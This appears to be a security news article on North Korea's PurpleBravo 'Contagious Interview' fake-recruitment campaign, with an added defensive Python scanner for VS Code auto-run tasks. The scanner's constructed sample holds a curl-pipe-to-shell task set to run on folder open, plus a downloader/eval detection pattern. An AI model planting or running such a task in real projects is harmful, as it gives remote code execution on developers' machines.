The Recruitment Trap: North Korea’s “Contagious Interview” Infiltrates Global AI Firms
The North Korean threat collective PurpleBravo has, for over a year, orchestrated a sophisticated and targeted offensive designated Contagious Interview. The campaign uses fraudulent recruitment processes to attack enterprises across Europe, Asia, the Middle East, and Central America. Researchers at Recorded Future have identified 3,136 IP addresses assessed as belonging to the operation’s targets, alongside 20 confirmed corporate victims. The victims span sectors as diverse as artificial intelligence, cryptocurrency, finance, IT services, marketing, and software engineering.
The incursions spanned from August 2024 to September 2025, with the highest concentration of targeted IP telemetry observed in South Asia and North America. Impacted organizations were situated in Belgium, Bulgaria, India, Italy, Costa Rica, the Netherlands, the United Arab Emirates, Pakistan, Romania, and Vietnam. Analysts underscore that in several instances, malicious code was executed directly on workstations, thereby escalating the peril from a singular user compromise to a systemic organizational threat.
A primary vector for infection involved the subversion of Visual Studio Code projects. Targets were presented with technical assignments containing deleterious files masquerading as legitimate development projects. This stratagem enabled the adversaries to install backdoors and secure a foothold within corporate infrastructures. Furthermore, the investigation unmasked fraudulent LinkedIn profiles operated by PurpleBravo members. These actors posed as developers and recruiters purportedly based in Odesa, utilizing several GitHub repositories to disseminate their malicious payloads.
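The "take-home assignment" vector works because a Visual Studio Code project folder can carry configuration that the editor acts on as soon as the folder is opened. The script below is an added defensive example, not code from the article or from Recorded Future, and it does not reproduce any PurpleBravo artifact. It scans an untrusted project before anyone opens it, flagging two documented auto-execution paths: a task in `.vscode/tasks.json` with `"runOn": "folderOpen"` (which VS Code runs automatically when the workspace is trusted), and checked-in workspace settings that redirect VS Code or a common extension to an executable path. The settings-key list is a partial, hand-picked set, the downloader heuristic is intentionally simple, and the sample project it builds is entirely constructed for the demonstration.

```python
"""Pre-flight check for an untrusted VS Code project (e.g. a recruiter's coding test).

Added example (not from the article). Flags .vscode configuration that can execute
code on folder open. Sample project data below is constructed for demonstration.
"""
import json
import re
import tempfile
from pathlib import Path

# Settings whose value names a program VS Code or a popular extension will execute.
# A checked-in workspace value pointing into the repo is a red flag.
# Partial list (assumption: extend for the extensions your developers install).
EXECUTABLE_SETTINGS = (
    "git.path",
    "python.defaultInterpreterPath",
    "php.validate.executablePath",
    "terminal.integrated.profiles.linux",
    "terminal.integrated.profiles.windows",
    "terminal.integrated.profiles.osx",
)

# Heuristic for task commands that fetch or evaluate content (not exhaustive).
DOWNLOADER_OR_EVAL = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-Expression|iex|node\s+-e|"
    r"python3?\s+-c|base64\s+(-d|--decode))\b",
    re.IGNORECASE,
)


def load_vscode_json(text: str) -> dict:
    """Parse VS Code's relaxed JSON: block comments, full-line // comments, trailing commas."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text) if text.strip() else {}


def scan_tasks(tasks: dict) -> list[str]:
    """Flag tasks that auto-run on folder open or whose command looks like a stager."""
    findings = []
    for task in tasks.get("tasks", []):
        label = task.get("label", "<unnamed>")
        run_on = (task.get("runOptions") or {}).get("runOn")
        parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
        command = " ".join(parts).strip()
        if run_on == "folderOpen":
            findings.append(f"tasks.json: task '{label}' runs automatically on folder open: {command}")
        if DOWNLOADER_OR_EVAL.search(command):
            findings.append(f"tasks.json: task '{label}' matches downloader/eval pattern: {command}")
    return findings


def scan_settings(settings: dict) -> list[str]:
    """Flag checked-in settings that override an executable path."""
    return [
        f"settings.json: workspace overrides executable setting {key!r} = {settings[key]!r}"
        for key in EXECUTABLE_SETTINGS
        if key in settings
    ]


def scan_project(root: Path) -> list[str]:
    """Scan <root>/.vscode for auto-execution vectors; returns human-readable findings."""
    vscode = Path(root) / ".vscode"
    findings = []
    tasks_file = vscode / "tasks.json"
    if tasks_file.is_file():
        findings += scan_tasks(load_vscode_json(tasks_file.read_text(encoding="utf-8")))
    settings_file = vscode / "settings.json"
    if settings_file.is_file():
        findings += scan_settings(load_vscode_json(settings_file.read_text(encoding="utf-8")))
    return findings


# Constructed sample: the kind of configuration a booby-trapped assignment might check in.
SAMPLE_TASKS_JSON = """{
    // looks like harmless project setup
    "version": "2.0.0",
    "tasks": [
        {
            "label": "install deps",
            "type": "shell",
            "command": "curl -s https://example.invalid/setup.sh | sh",
            "runOptions": { "runOn": "folderOpen" },
        }
    ],
}"""

SAMPLE_SETTINGS_JSON = """{
    "editor.tabSize": 2,
    "python.defaultInterpreterPath": "./.venv/bin/python"
}"""


def demo() -> list[str]:
    """Write the constructed sample project to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        vscode = Path(tmp) / ".vscode"
        vscode.mkdir()
        (vscode / "tasks.json").write_text(SAMPLE_TASKS_JSON, encoding="utf-8")
        (vscode / "settings.json").write_text(SAMPLE_SETTINGS_JSON, encoding="utf-8")
        return scan_project(Path(tmp))


if __name__ == "__main__":
    for line in demo():
        print("FINDING:", line)
```

Run it against a cloned assignment repository with `scan_project(Path("path/to/repo"))` before the folder is opened in an editor. A clean result is not a guarantee (build scripts, dependency manifests and editor extensions are further execution paths), but any finding here is a strong reason to open the project only on an isolated, non-corporate machine, which is the control the rest of this article argues for.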
The PurpleBravo command structure orchestrates at least two distinct command-and-control (C2) frameworks for disparate malware strains. One is a JavaScript-based infostealer dubbed BeaverTail; the other is GolangGhost, a Go-based backdoor derived from the open-source project HackBrowserData. These C2 servers are distributed across 17 different providers, managed via the Astrill VPN service, and utilize IP addresses originating from China.
Concurrently, a parallel initiative known as Wagemole has been identified. In this scheme, North Korean operatives secure employment within foreign firms by obfuscating their national origin. Despite their differing immediate objectives, the two operations share significant infrastructure and tactical overlaps. Forensic analysis has documented instances where a singular IP address associated with PurpleBravo was simultaneously utilized to manage Wagemole-related activities.
A fundamental vulnerability exploited by PurpleBravo is the inherent trust organizations place in external contractors and prospective candidates. By delivering “technical assessments” that candidates unwittingly execute on corporate-issued devices, the adversaries ensure that the resulting compromise transcends the individual, imperiling the entire organizational fabric. This poses an especially grave risk to companies with expansive client bases, creating significant vulnerabilities within the broader software supply chain.